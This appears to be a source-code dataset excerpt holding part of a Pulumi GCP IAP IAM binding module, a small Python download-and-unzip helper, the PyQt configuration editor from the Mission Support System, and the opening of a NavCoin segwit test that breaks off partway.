```python
import pulumi
import pulumi_gcp as gcp
member = gcp.iap.WebIamMember("member",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
member="user:jane@example.com",
condition=gcp.iap.WebIamMemberConditionArgs(
title="expires_after_2019_12_31",
description="Expiring at midnight of 2019-12-31",
expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")",
))
```
## Import
For all import syntaxes, the "resource in question" can take any of the following forms* projects/{{project}}/iap_web * {{project}} Any variables not passed in the import command will be taken from the provider configuration. Identity-Aware Proxy web IAM resources can be imported using the resource identifiers, role, and member. IAM member imports use space-delimited identifiersthe resource in question, the role, and the member identity, e.g.
```sh
$ pulumi import gcp:iap/webIamMember:WebIamMember editor "projects/{{project}}/iap_web roles/iap.httpsResourceAccessor user:jane@example.com"
```
IAM binding imports use space-delimited identifiersthe resource in question and the role, e.g.
```sh
$ pulumi import gcp:iap/webIamMember:WebIamMember editor "projects/{{project}}/iap_web roles/iap.httpsResourceAccessor"
```
IAM policy imports use the identifier of the resource in question, e.g.
```sh
$ pulumi import gcp:iap/webIamMember:WebIamMember editor projects/{{project}}/iap_web
```
-> **Custom Roles**If you're importing a IAM resource with a custom role, make sure to use the
full name of the custom role, e.g. `[projects/my-project|organizations/my-org]/roles/my-custom-role`.
:param str resource_name: The name of the resource.
:param WebIamMemberArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(WebIamMemberArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']]] = None,
member: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = WebIamMemberArgs.__new__(WebIamMemberArgs)
__props__.__dict__["condition"] = condition
if member is None and not opts.urn:
raise TypeError("Missing required property 'member'")
__props__.__dict__["member"] = member
__props__.__dict__["project"] = project
if role is None and not opts.urn:
raise TypeError("Missing required property 'role'")
__props__.__dict__["role"] = role
__props__.__dict__["etag"] = None
super(WebIamMember, __self__).__init__(
'gcp:iap/webIamMember:WebIamMember',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']]] = None,
etag: Optional[pulumi.Input[str]] = None,
member: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None) -> 'WebIamMember':
"""
Get an existing WebIamMember resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']] condition: ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding.
Structure is documented below.
:param pulumi.Input[str] etag: (Computed) The etag of the IAM policy.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used.
:param pulumi.Input[str] role: The role that should be applied. Only one
`iap.WebIamBinding` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _WebIamMemberState.__new__(_WebIamMemberState)
__props__.__dict__["condition"] = condition
__props__.__dict__["etag"] = etag
__props__.__dict__["member"] = member
__props__.__dict__["project"] = project
__props__.__dict__["role"] = role
return WebIamMember(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def condition(self) -> pulumi.Output[Optional['outputs.WebIamMemberCondition']]:
"""
) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding.
Structure is documented below.
"""
return pulumi.get(self, "condition")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
(Computed) The etag of the IAM policy.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def member(self) -> pulumi.Output[str]:
return pulumi.get(self, "member")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter
def role(self) -> pulumi.Output[str]:
"""
The role that should be applied. Only one
`iap.WebIamBinding` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
"""
return pulumi.get(self, "role")
| 44.823024 | 454 | 0.642427 |
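The docstrings above already show how to create bindings; the sketch below instead uses the get() class method defined in this file to adopt an existing member into a program. The project and identity are placeholders, and the id string follows the space-delimited import format documented in the docstring, which is an assumption on my part for get().

import pulumi
import pulumi_gcp as gcp

# rebuild an existing IAM member from provider state instead of creating it
existing = gcp.iap.WebIamMember.get(
    "editor",
    id="projects/my-project/iap_web roles/iap.httpsResourceAccessor user:jane@example.com")
pulumi.export("member_role", existing.role)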
758164568d21bee6437ac5f3320f2028db46c6f5 | 972 | py | Python | pycessing/download.py | kitao/pycessing | ab59dfbef7f52712e894f5b4d869c27f68bf3685 | ["MIT"] | null | null | null | pycessing/download.py | kitao/pycessing | ab59dfbef7f52712e894f5b4d869c27f68bf3685 | ["MIT"] | null | null | null | pycessing/download.py | kitao/pycessing | ab59dfbef7f52712e894f5b4d869c27f68bf3685 | ["MIT"] | null | null | null |

import os
import sys
import urllib2
def download(url, dest_dir):
basename = os.path.basename(url)
sys.stdout.write('download {0} ... '.format(basename))
sys.stdout.flush()
filename = os.path.join(dest_dir, basename)
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
with open(filename, 'wb') as f:
f.write(urllib2.urlopen(url).read())
print 'done'
return filename
def unzip(filename):
import zipfile
dest_dir, basename = os.path.split(filename)
sys.stdout.write('unzip {0} ... '.format(basename))
sys.stdout.flush()
with zipfile.ZipFile(filename, 'r') as zf:
zf.extractall(dest_dir)
os.remove(filename)
for root, dirs, files in os.walk(dest_dir):
for name in files:
if name.startswith('._'):
os.remove(os.path.join(root, name))
print 'done'
def url_to_filename(url, dest_dir):
    basename = os.path.basename(url)
    return os.path.join(dest_dir, basename)
def makedirs(path):
if not os.path.exists(path):
os.makedirs(path)
| 19.836735 | 56 | 0.675926 |
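A brief usage sketch for the two helpers above. The module is written for Python 2 (print statements, urllib2), and the URL, cache directory and import path are placeholders.

from pycessing.download import download, unzip

# download() writes the file into the destination directory (creating it if
# needed) and returns the local filename; unzip() extracts next to it and
# deletes the archive afterwards
filename = download('http://example.com/assets.zip', 'cache')
unzip(filename)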
e22fbc391dee37f699b73cbbf6301accce114438 | 32,051 | py | Python | mslib/msui/editor.py | kawalpreettkaur/MSS | ee97789ddd320a4c47f4ceebaf72e792dc2b8d63 | ["Apache-2.0"] | 1 | 2021-10-05T16:23:43.000Z | 2021-10-05T16:23:43.000Z | mslib/msui/editor.py | kawalpreettkaur/MSS | ee97789ddd320a4c47f4ceebaf72e792dc2b8d63 | ["Apache-2.0"] | null | null | null | mslib/msui/editor.py | kawalpreettkaur/MSS | ee97789ddd320a4c47f4ceebaf72e792dc2b8d63 | ["Apache-2.0"] | null | null | null |

# -*- coding: utf-8 -*-
"""
mslib.msui.editor
~~~~~~~~~~~~~~~~~~~~~~
config editor for mss_settings.json.
This file is part of mss.
:copyright: Copyright 2020 Vaibhav Mehra <veb7vmehra@gmail.com>
:copyright: Copyright 2020-2021 by the mss team, see AUTHORS.
:license: APACHE-2.0, see LICENSE for details.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import collections.abc
import copy
import fs
import logging
import json
from mslib.msui.mss_qt import get_open_filename, get_save_filename, show_popup
from mslib.msui.mss_qt import ui_configuration_editor_window as ui_conf
from PyQt5 import QtWidgets, QtCore, QtGui
from mslib.msui.constants import MSS_SETTINGS
from mslib.msui.icons import icons
from mslib.utils.config import MissionSupportSystemDefaultConfig as mss_default
from mslib.utils.config import config_loader, dict_raise_on_duplicates_empty, merge_data
from mslib.support.qt_json_view import delegate
from mslib.support.qt_json_view.view import JsonView
from mslib.support.qt_json_view.model import JsonModel
from mslib.support.qt_json_view.datatypes import match_type, DataType, TypeRole, ListType
InvalidityRole = TypeRole + 1
DummyRole = TypeRole + 2
default_options = config_loader(default=True)
def get_root_index(index, parents=False):
parent_list = []
while index.parent().isValid():
index = index.parent()
parent_list.append(index)
parent_list.reverse()
if parents:
return index, parent_list
return index
class JsonDelegate(delegate.JsonDelegate):
def paint(self, painter, option, index):
"""Use method from the data type or fall back to the default."""
if index.column() == 0:
source_model = index.model()
if isinstance(source_model, QtCore.QAbstractProxyModel):
source_model = source_model.sourceModel()
data = source_model.serialize()
# bold the key which has non-default value
root_index, parents = get_root_index(index, parents=True)
parents.append(index)
key = root_index.data()
if key in mss_default.list_option_structure or \
key in mss_default.dict_option_structure or \
key in mss_default.key_value_options:
if root_index == index and data[key] != default_options[key]:
option.font.setWeight(QtGui.QFont.Bold)
elif key in mss_default.fixed_dict_options:
model_data = data[key]
default_data = default_options[key]
for parent in parents[1:]:
parent_data = parent.data()
if isinstance(default_data, list):
parent_data = int(parent.data())
model_data = model_data[parent_data]
default_data = default_data[parent_data]
if model_data != default_data:
option.font.setWeight(QtGui.QFont.Bold)
return super(JsonDelegate, self).paint(painter, option, index)
type_ = index.data(TypeRole)
if isinstance(type_, DataType):
try:
super(JsonDelegate, self).paint(painter, option, index)
return type_.paint(painter, option, index)
except NotImplementedError:
pass
return super(JsonDelegate, self).paint(painter, option, index)
class JsonSortFilterProxyModel(QtCore.QSortFilterProxyModel):
def filterAcceptsRow(self, source_row, source_parent):
# check if an item is currently accepted
accepted = super(JsonSortFilterProxyModel, self).filterAcceptsRow(source_row, source_parent)
if accepted:
return True
# checking if parent is accepted (works only for indexes with depth 2)
src_model = self.sourceModel()
index = src_model.index(source_row, self.filterKeyColumn(), source_parent)
has_parent = src_model.itemFromIndex(index).parent()
if has_parent:
parent_index = self.mapFromSource(has_parent.index())
return super(JsonSortFilterProxyModel, self).filterAcceptsRow(has_parent.row(), parent_index)
return accepted
class ConfigurationEditorWindow(QtWidgets.QMainWindow, ui_conf.Ui_ConfigurationEditorWindow):
"""MSUI configuration editor class. Provides user interface elements for editing mss_settings.json
"""
restartApplication = QtCore.pyqtSignal(name="restartApplication")
def __init__(self, parent=None):
super(ConfigurationEditorWindow, self).__init__(parent)
self.setupUi(self)
options = config_loader()
self.path = MSS_SETTINGS
self.last_saved = copy.deepcopy(options)
self.optCb.addItem("All")
for option in sorted(options.keys(), key=str.lower):
self.optCb.addItem(option)
# Create view and place in parent widget
self.view = JsonView()
self.view.setItemDelegate(JsonDelegate())
self.view.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.jsonWidget.setLayout(QtWidgets.QVBoxLayout())
self.jsonWidget.layout().setContentsMargins(0, 0, 0, 0)
self.jsonWidget.layout().addWidget(self.view)
# Create proxy model for filtering
self.proxy_model = JsonSortFilterProxyModel()
self.json_model = JsonModel(data=options, editable_keys=True, editable_values=True)
self.json_model.setHorizontalHeaderLabels(['Option', 'Value'])
# Set view model
self.proxy_model.setSourceModel(self.json_model)
self.view.setModel(self.proxy_model)
# Setting proxy model and view attributes
self.proxy_model.setFilterKeyColumn(0)
# Add actions to toolbar
self.import_file_action = QtWidgets.QAction(
QtGui.QIcon(icons("config_editor", "Folder-new.svg")), "Import config", self)
self.import_file_action.setStatusTip("Import an external configuration file")
self.toolBar.addAction(self.import_file_action)
self.save_file_action = QtWidgets.QAction(
QtGui.QIcon(icons("config_editor", "Document-save.svg")), "Save config", self)
self.save_file_action.setStatusTip("Save current configuration")
self.toolBar.addAction(self.save_file_action)
self.export_file_action = QtWidgets.QAction(
QtGui.QIcon(icons("config_editor", "Document-save-as.svg")), "Export config", self)
self.export_file_action.setStatusTip("Export current configuration")
self.toolBar.addAction(self.export_file_action)
# Button signals
self.optCb.currentIndexChanged.connect(self.set_option_filter)
self.addOptBtn.clicked.connect(self.add_option_handler)
self.removeOptBtn.clicked.connect(self.remove_option_handler)
self.restoreDefaultsBtn.clicked.connect(self.restore_defaults)
self.moveUpTb.clicked.connect(lambda: self.move_option(move=1))
self.moveDownTb.clicked.connect(lambda: self.move_option(move=-1))
# File action signals
self.import_file_action.triggered.connect(self.import_config)
self.save_file_action.triggered.connect(self.save_config)
self.export_file_action.triggered.connect(self.export_config)
# View/Model signals
self.view.selectionModel().selectionChanged.connect(self.tree_selection_changed)
self.json_model.dataChanged.connect(self.update_view)
# set behaviour of widgets
self.moveUpTb.hide()
self.moveDownTb.hide()
self.moveUpTb.setAutoRaise(True)
self.moveUpTb.setArrowType(QtCore.Qt.UpArrow)
self.moveUpTb.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly)
self.moveDownTb.setAutoRaise(True)
self.moveDownTb.setArrowType(QtCore.Qt.DownArrow)
self.moveDownTb.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly)
self.moveUpTb.setEnabled(False)
self.moveDownTb.setEnabled(False)
self.addOptBtn.setEnabled(False)
self.removeOptBtn.setEnabled(False)
self.restoreDefaultsBtn.setEnabled(False)
# set tooltip and make keys non-editable
self.set_noneditable_items(QtCore.QModelIndex())
# json view attributes
self.view.setAlternatingRowColors(True)
self.view.setColumnWidth(0, self.view.width() // 2)
# Add invalidity roles and update status of keys
self.update_view()
self.restart_on_save = True
def set_noneditable_items(self, parent):
for r in range(self.json_model.rowCount(parent)):
index = self.json_model.index(r, 0, parent)
item = self.json_model.itemFromIndex(index)
item.setEditable(False)
if item.text() in mss_default.fixed_dict_options:
self.set_noneditable_items(index)
if item.text() in mss_default.config_descriptions:
item.setData(mss_default.config_descriptions[item.text()], QtCore.Qt.ToolTipRole)
def tree_selection_changed(self, selected, deselected):
"""Enable/Disable appropriate buttons based on selection in treeview
"""
selection = self.view.selectionModel().selectedRows()
# if no selection
add, remove, restore_defaults, move = [False] * 4
if len(selection) == 1:
index = selection[0]
if not index.parent().isValid():
move = True
root_index = get_root_index(index)
if root_index.data() not in mss_default.fixed_dict_options + mss_default.key_value_options:
add, move = True, True
# display error message if key has invalid values
if not index.parent().isValid():
root_index = get_root_index(index)
source_index = self.proxy_model.mapToSource(root_index)
item = self.json_model.itemFromIndex(source_index)
if any(item.data(InvalidityRole)):
invalidity = item.data(InvalidityRole)
errors = {"empty": invalidity[0], "duplicate": invalidity[1], "invalid": invalidity[2]}
msg = ", ".join([key for key in errors if errors[key]])
msg += " values found"
self.statusbar.showMessage(msg)
elif item.data(DummyRole):
self.statusbar.showMessage("Dummy values found")
else:
self.statusbar.showMessage("")
if len(selection) >= 1:
restore_defaults = True
for index in selection:
index = get_root_index(index)
if index.data() not in mss_default.fixed_dict_options + mss_default.key_value_options \
and self.proxy_model.rowCount(index) > 0:
remove = True
break
self.addOptBtn.setEnabled(add)
self.removeOptBtn.setEnabled(remove)
self.restoreDefaultsBtn.setEnabled(restore_defaults)
self.moveUpTb.setEnabled(move)
self.moveDownTb.setEnabled(move)
def update_view(self):
"""
Set InvalidRole and DummyRole for all root items in the treeview and highlight appropriately.
InvalidRole -> Boolean list indicating if item has Empty, Duplicate, Invalid values
DummyRole -> Boolean value indicating if item has dummy value
"""
source_model = self.json_model
data = source_model.serialize()
parent = QtCore.QModelIndex()
for r in range(source_model.rowCount(parent)):
root_index = source_model.index(r, 0, parent)
root_item = source_model.itemFromIndex(root_index)
empty, duplicate, invalid, dummy = [False] * 4
color = QtCore.Qt.transparent
key = root_index.data()
if key in mss_default.dict_option_structure:
child_keys = set()
rows = source_model.rowCount(root_index)
for row in range(rows):
child_key_data = source_model.index(row, 0, root_index).data()
child_keys.add(child_key_data)
if child_key_data == "":
empty = True
# check for dummy values
default = mss_default.dict_option_structure[key]
values_dict = data[key]
for value in values_dict:
if value in default:
if default[value] == values_dict[value]:
dummy = True
color = QtCore.Qt.gray
break
# condition for checking duplicate and empty keys
if len(child_keys) != rows or empty:
duplicate = True
color = QtCore.Qt.red
elif key in mss_default.list_option_structure:
values_list = data[key]
# check if any dummy values
if any([value == mss_default.list_option_structure[key][0] for value in values_list]):
dummy = True
color = QtCore.Qt.gray
# check if any empty values
if any([value == "" for value in values_list]):
empty = True
color = QtCore.Qt.red
# check if any duplicate values
if len(set(values_list)) != len(values_list):
duplicate = True
color = QtCore.Qt.red
elif key == 'filepicker_default':
if data[key] not in ['default', 'qt', 'fs']:
invalid = True
color = QtCore.Qt.red
# set invalidityroles and dummyrole for key
root_item.setData([empty, duplicate, invalid], InvalidityRole)
root_item.setData(dummy, DummyRole)
# set color for column 1
item = source_model.itemFromIndex(root_index)
item.setBackground(color)
# set color for column 2
source_index = source_model.index(r, 1, parent)
item = source_model.itemFromIndex(source_index)
item.setBackground(color)
def set_option_filter(self, index):
# By default FilterKeyColumn of the proxy model is set to 0
if self.optCb.currentText() == "All":
self.proxy_model.setFilterRegExp("")
return
self.proxy_model.setFilterRegExp(QtCore.QRegExp(f"^{self.optCb.currentText()}$"))
self.view.expandAll()
def add_option_handler(self):
selection = self.view.selectionModel().selectedRows()
if len(selection) == 0 or len(selection) > 1:
logging.debug("zero or multiple selections while trying to add new value")
self.statusbar.showMessage("Please select one option to add new value")
return
selected_index = get_root_index(selection[0])
option = selected_index.data()
parent = QtCore.QModelIndex()
for r in range(self.json_model.rowCount(parent)):
index = self.json_model.index(r, 0, parent)
item = self.json_model.itemFromIndex(index)
if index.data() == option:
if option in mss_default.fixed_dict_options + mss_default.key_value_options:
# Cannot add options to fixed structure options
self.statusbar.showMessage(
"Option already exists. Please change value to your preference or restore to default.")
return
elif option in mss_default.dict_option_structure:
# Append dummy value dict to options having a dictionary structure
json_data = mss_default.dict_option_structure[option]
type_ = match_type(json_data)
type_.next(model=self.json_model, data=json_data, parent=item)
elif option in mss_default.list_option_structure:
# Append dummy value to options having a list structure
json_data = mss_default.list_option_structure[option]
type_ = match_type(json_data)
type_.next(model=self.json_model, data=json_data, parent=item)
# increase row count in view
rows = self.json_model.rowCount(index) - 1
new_item = self.json_model.itemFromIndex(self.json_model.index(rows, 0, index))
new_item.setData(rows, QtCore.Qt.DisplayRole)
self.statusbar.showMessage("")
# expand root item
proxy_index = self.proxy_model.mapFromSource(index)
self.view.expand(proxy_index)
# expand, scroll to and select new item
rows = self.json_model.rowCount(index) - 1
new_index = self.json_model.index(rows, 0, index)
proxy_index = self.proxy_model.mapFromSource(new_index)
self.view.expand(proxy_index)
self.view.scrollTo(proxy_index)
self.view.selectionModel().select(
proxy_index, QtCore.QItemSelectionModel.ClearAndSelect | QtCore.QItemSelectionModel.Rows)
logging.debug("Added new value for %s" % option )
self.update_view()
break
def remove_option_handler(self):
selection = self.view.selectionModel().selectedRows()
if len(selection) == 0:
logging.debug("zero selections while trying to remove option")
self.statusbar.showMessage("Please select one/more options to remove")
return
# Collect all removable indexes from selected items
non_removable = []
removable_indexes = {}
for index in selection:
if not index.parent().isValid():
if index.data() not in mss_default.fixed_dict_options + mss_default.key_value_options:
removable_indexes[index] = set(range(self.proxy_model.rowCount(index)))
else:
# cannot remove root item
non_removable.append(index)
else:
# find penultimate option key
while index.parent().parent().isValid():
index = index.parent()
root = index.parent()
# enter only if root option not in fixed dictionary / key value options
if root.data() not in mss_default.fixed_dict_options + mss_default.key_value_options:
if root in removable_indexes:
removable_indexes[root].add(index.row())
else:
removable_indexes[root] = set([index.row()])
else:
non_removable.append(index)
if removable_indexes == {} and non_removable != []:
self.statusbar.showMessage("Default options are not removable.")
return
# ToDo add confirmation dialog here
options = "\n".join([index.data() for index in removable_indexes])
logging.debug("Attempting to remove the following options\n%s" % options)
self.view.selectionModel().clearSelection()
for index in removable_indexes:
rows = sorted(list(removable_indexes[index]))
for count, row in enumerate(rows):
row = row - count
self.proxy_model.removeRow(row, parent=index)
# fix row number in list type options
source_index = self.proxy_model.mapToSource(index)
source_item = self.json_model.itemFromIndex(source_index)
if isinstance(source_item.data(QtCore.Qt.UserRole + 1), ListType):
for r in range(self.json_model.rowCount(source_index)):
child_index = self.json_model.index(r, 0, source_index)
item = self.json_model.itemFromIndex(child_index)
item.setData(r, QtCore.Qt.DisplayRole)
self.statusbar.showMessage("Successfully removed values selected options")
self.update_view()
def restore_defaults(self):
def update(data, option, value):
"""Function to update dict at a depth"""
for k, v in data.items():
if k == option:
data[k] = value
break
if isinstance(v, collections.abc.Mapping):
data[k] = update(data.get(k, {}), option, value)
return data
selection = self.view.selectionModel().selectedRows()
if len(selection) == 0:
logging.debug("no selections while trying to restore defaults")
self.statusbar.showMessage("Please select one/more options to restore defaults")
return
# get list of distinct indexes to restore
model_data = self.json_model.serialize()
selected_indexes = set()
for index in selection:
root_index, parent_list = get_root_index(index, parents=True)
added = False
data = model_data
for parent in parent_list + [index]:
data = data[parent.data()]
if isinstance(data, list):
added = True
selected_indexes.add(parent)
break
if not added:
selected_indexes.add(index)
# ToDo add confirmation dialog here
options = "\n".join([index.data() for index in selected_indexes])
logging.debug("Attempting to restore defaults for the following options\n%s" % options)
for index in selected_indexes:
# check if root option and present in mss_default.key_value_options
if not index.parent().isValid() and index.data() in mss_default.key_value_options:
value_index = self.json_model.index(index.row(), 1, QtCore.QModelIndex())
value_item = self.json_model.itemFromIndex(value_index)
value_item.setData(default_options[index.data()], QtCore.Qt.DisplayRole)
continue
root_index, parent_list = get_root_index(index, parents=True)
option = root_index.data()
model_data = self.json_model.serialize()
if option in mss_default.fixed_dict_options:
if index == root_index:
json_data = default_options[option]
else:
key = None
value = copy.deepcopy(default_options)
for parent in parent_list + [index]:
parent_data = parent.data()
if isinstance(value, list):
break
key = parent_data
value = value[parent_data]
data = copy.deepcopy(model_data[option])
json_data = update(data, key, value)
else:
json_data = default_options[option]
if model_data[option] == json_data:
continue
# remove all rows
for row in range(self.proxy_model.rowCount(root_index)):
self.proxy_model.removeRow(0, parent=root_index)
# add default values
source_index = self.proxy_model.mapToSource(root_index)
source_item = self.json_model.itemFromIndex(source_index)
type_ = match_type(json_data)
type_.next(model=self.json_model, data=json_data, parent=source_item)
self.statusbar.showMessage("Defaults restored for selected options")
self.view.clearSelection()
self.update_view()
def import_config(self):
file_path = get_open_filename(self, "Import config", "", ";;".join(["JSON Files (*.json)", "All Files (*.*)"]))
if not file_path:
return
# load data from selected file
dir_name, file_name = fs.path.split(file_path)
with fs.open_fs(dir_name) as _fs:
if _fs.exists(file_name):
file_content = _fs.readtext(file_name)
try:
json_file_data = json.loads(file_content, object_pairs_hook=dict_raise_on_duplicates_empty)
except json.JSONDecodeError as e:
show_popup(self, "Error while loading file", e)
logging.error("Error while loading json file %s" % e)
return
except ValueError as e:
show_popup(self, "Invalid keys detected", e)
logging.error("Error while loading json file %s" % e)
return
if json_file_data:
json_model_data = self.json_model.serialize()
options = merge_data(copy.deepcopy(json_model_data), json_file_data)
if options == json_model_data:
self.statusbar.showMessage("No option with new values found")
return
# replace existing data with new data
self.json_model.init(options, editable_keys=True, editable_values=True)
self.view.setColumnWidth(0, self.view.width() // 2)
self.set_noneditable_items(QtCore.QModelIndex())
self.update_view()
self.statusbar.showMessage("Successfully imported config")
logging.debug("Imported new config data from file")
else:
self.statusbar.showMessage("No data found in the file")
logging.debug("No data found in the file, using existing settings")
def _save_to_path(self, filename):
self.last_saved = self.json_model.serialize()
json_data = copy.deepcopy(self.last_saved)
save_data = copy.deepcopy(self.last_saved)
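        # Drop entries that still match the shipped defaults (or are empty/blank
        # containers) so that only user-modified options are written to disk.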
for key in json_data:
if json_data[key] == default_options[key] or json_data[key] == {} or json_data[key] == []:
del save_data[key]
dir_name, file_name = fs.path.split(filename)
with fs.open_fs(dir_name) as _fs:
_fs.writetext(file_name, json.dumps(save_data, indent=4))
def validate_data(self):
invalid, dummy = False, False
parent = QtCore.QModelIndex()
for r in range(self.json_model.rowCount(parent)):
index = self.json_model.index(r, 0, parent)
item = self.json_model.itemFromIndex(index)
invalid |= any(item.data(InvalidityRole))
dummy |= item.data(DummyRole)
return invalid, dummy
def check_modified(self):
return not self.last_saved == self.json_model.serialize()
def save_config(self):
invalid, dummy = self.validate_data()
if invalid:
show_popup(
self,
"Invalid values detected",
"Please correct the invalid values (keys colored in red) to be able to save.")
self.statusbar.showMessage("Please correct the values and try saving again")
return False
if dummy and self.check_modified():
ret = QtWidgets.QMessageBox.warning(
self, self.tr("Dummy values detected"),
self.tr("Dummy values detected (keys colored in gray.)\n"
"Since they are dummy values you might face issues later on while working."
"\n\nDo you still want to continue to save?"),
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if ret == QtWidgets.QMessageBox.No:
self.statusbar.showMessage("Please correct the values and try saving")
return False
if self.check_modified():
if self.restart_on_save:
ret = QtWidgets.QMessageBox.warning(
self, self.tr("Mission Support System"),
self.tr("Do you want to restart the application?\n"
"(This is necessary to apply changes)\n\n"
"Please note that clicking 'No' will not save the current configuration"),
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if ret == QtWidgets.QMessageBox.Yes:
logging.debug("saving config file to: %s and restarting MSS" % self.path)
self._save_to_path(self.path)
self.restartApplication.emit()
self.restart_on_save = False
self.close()
else:
return
self.restart_on_save = True
logging.debug("saving config file to: %s" % self.path)
self._save_to_path(self.path)
else:
self.statusbar.showMessage("No values changed")
return True
def export_config(self):
invalid, dummy = self.validate_data()
if invalid:
show_popup(
self,
"Invalid values detected",
"Please correct the invalid values (keys colored in red) to be able to save.")
self.statusbar.showMessage("Please correct the values and try exporting")
return False
if self.json_model.serialize() == default_options:
msg = """Since the current configuration matches the default configuration, \
only an empty json file would be exported.\nDo you still want to continue?"""
ret = QtWidgets.QMessageBox.warning(
self, self.tr("Mission Support System"), self.tr(msg),
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if ret == QtWidgets.QMessageBox.No:
return
path = get_save_filename(self, "Export configuration", "mss_settings", "JSON files (*.json)")
if path:
self._save_to_path(path)
def closeEvent(self, event):
msg = ""
invalid, dummy = self.validate_data()
if invalid:
msg = self.tr("Invalid keys/values found in config.\nDo you want to rectify and save changes?")
        elif dummy and not self.check_modified():
msg = self.tr("Dummy keys/values found in config.\nDo you want to rectify and save changes?")
elif self.check_modified():
msg = self.tr(
"Save Changes to default mss_settings.json?\nYou need to restart the gui for changes to take effect.")
if msg != "":
ret = QtWidgets.QMessageBox.warning(
self, self.tr("Mission Support System"), self.tr(msg),
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if ret == QtWidgets.QMessageBox.Yes:
if not self.save_config():
event.ignore()
return
elif self.restart_on_save:
ret = QtWidgets.QMessageBox.warning(
self, self.tr("Mission Support System"),
self.tr("Do you want to close the config editor?"),
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if ret == QtWidgets.QMessageBox.No:
event.ignore()
return
event.accept()
| 45.205924 | 119 | 0.608062 |
69a6f87cbb67029a5ad349cf5638bd93652e9ff8 | 12,234 | py | Python | qa/rpc-tests/segwit.py | supertref/navcoin-core | cc6fd1c9661fcbd3b82c8f2506c0f863da43b392 | [
"MIT"
] | 1 | 2020-08-28T02:32:47.000Z | 2020-08-28T02:32:47.000Z | qa/rpc-tests/segwit.py | supertref/navcoin-core | cc6fd1c9661fcbd3b82c8f2506c0f863da43b392 | [
"MIT"
] | 3 | 2019-07-18T02:10:02.000Z | 2019-08-28T22:09:31.000Z | qa/rpc-tests/segwit.py | supertref/navcoin-core | cc6fd1c9661fcbd3b82c8f2506c0f863da43b392 | [
"MIT"
] | 2 | 2020-09-06T20:02:00.000Z | 2020-11-19T18:47:42.000Z | #!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test the SegWit changeover logic
#
from test_framework.test_framework import NavCoinTestFramework
from test_framework.util import *
from test_framework.mininode import sha256, ripemd160
import os
import shutil
NODE_0 = 0
NODE_1 = 1
NODE_2 = 2
WIT_V0 = 0
WIT_V1 = 1
def witness_script(version, pubkey):
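    # Both branches build a segwit v0 scriptPubKey: version 0 here means a
    # pay-to-witness-pubkey-hash program (OP_0 <20-byte HASH160(pubkey)>), while
    # "version 1" in this test means a pay-to-witness-script-hash program
    # (OP_0 <32-byte SHA256(1-of-1 multisig script)>), not a new witness version.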
if (version == 0):
pubkeyhash = bytes_to_hex_str(ripemd160(sha256(hex_str_to_bytes(pubkey))))
pkscript = "0014" + pubkeyhash
